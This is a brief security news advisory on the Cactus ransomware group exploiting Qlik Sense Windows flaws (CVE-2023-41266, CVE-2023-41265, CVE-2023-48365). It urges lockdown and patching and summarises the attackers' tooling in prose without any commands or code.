Ransomware is exploiting Qlik Sense BI platform bugs to breach networks
Take action: If you are using Qlik Sense Enterprise for Windows, IMMEDIATELTY lock it down in your internal network. Then start patching as soon as possible.
Learn More
The Cactus ransomware group has been exploiting critical vulnerabilities in Qlik Sense, a data analytics/BI platform, to infiltrate corporate networks. Qlik Sense had two major security flaws in its Windows version at the end of August.
The first, a path traversal bug (CVE-2023-41266), allows for the creation of anonymous sessions and unauthorized HTTP requests. The second, a more severe issue (CVE-2023-41265), enables privilege escalation and backend server HTTP request execution without requiring authentication. Qlik identified that the initial fix for CVE-2023-41265 was inadequate, leading to a revised update and the identification of a new vulnerability (CVE-2023-48365).
Cactus ransomware is actively exploiting these unpatched vulnerabilities in public Qlik Sense instances.
The attack involves using PowerShell and BITS to download tools for persistence and remote access, including disguised ManageEngine UEMS executables, AnyDesk, and a renamed Plink binary. The attackers also use discovery commands, disable antivirus software, change administrator passwords, and establish RDP tunnels for concealment and data gathering.
In the attack's final phase, the Cactus ransomware is deployed. The use of RDP for lateral movement, WizTree for disk space analysis, and disguised rclone for data exfiltration matches the pattern seen in previous Cactus ransomware attacks.
